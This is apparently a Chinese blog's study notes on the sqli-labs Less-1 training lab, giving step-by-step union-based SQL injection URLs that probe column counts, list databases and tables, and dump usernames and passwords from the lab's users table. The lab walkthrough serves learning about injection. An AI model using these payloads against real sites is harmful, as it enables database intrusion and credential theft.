zoukankan      html  css  js  c++  java
  • 读书笔记--第三章

    第三章将的就是靶场的实验:靶场+工具+手工

    0x01  sqli-Less1

    1.判断SQL注入

    手工判断是否存在注入点(加 ’ ,出现错误提示则可能存在注入漏洞)→判断类型(数字型or字符型)

    (搜索型注入:搜索页面搜索:% 、‘ % & 等特殊字符,如果存在则可能存在漏洞)

     2.存在漏洞,且为字符型

     3.猜字段数

    http://192.168.5.128/sqli/Less-1/?id=1' order by 3--+ #不报错 字段数为3

     4.联合查询字段数

    http://192.168.5.128/sqli/Less-1/?id=1' and 1=2 union select 1,2,3--+

     5.查看所有数据库名

    http://192.168.5.128/sqli/Less-1/
    ?id=1' and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

    6. 查询security内所有表名

    http://192.168.5.128/sqli/Less-1/
    ?id=1' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

    7.爆破security里面的user表中的列名,然后爆出用户名和密码

    union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+
    http://192.168.5.128/sqli/Less-1/
    ?id=1' and 1=2 union select 1,(select group_concat(password) from security.users),(select group_concat(username)from security.users)--+

  • 相关阅读:
    [转]java中的匿名内部类总结
    linux 命令总结
    [转载]nohub java -jar xx.jar >/dev/null 2>&1 &
    Java正则表达式Pattern和Matcher类详解
    spark基础知识介绍(包含foreachPartition写入mysql)
    spark 运行架构
    spark核心原理
    行动操作
    控制操作
    键值转换操作
  • 原文地址:https://www.cnblogs.com/TEAM0N/p/14282336.html
Copyright © 2011-2022 走看看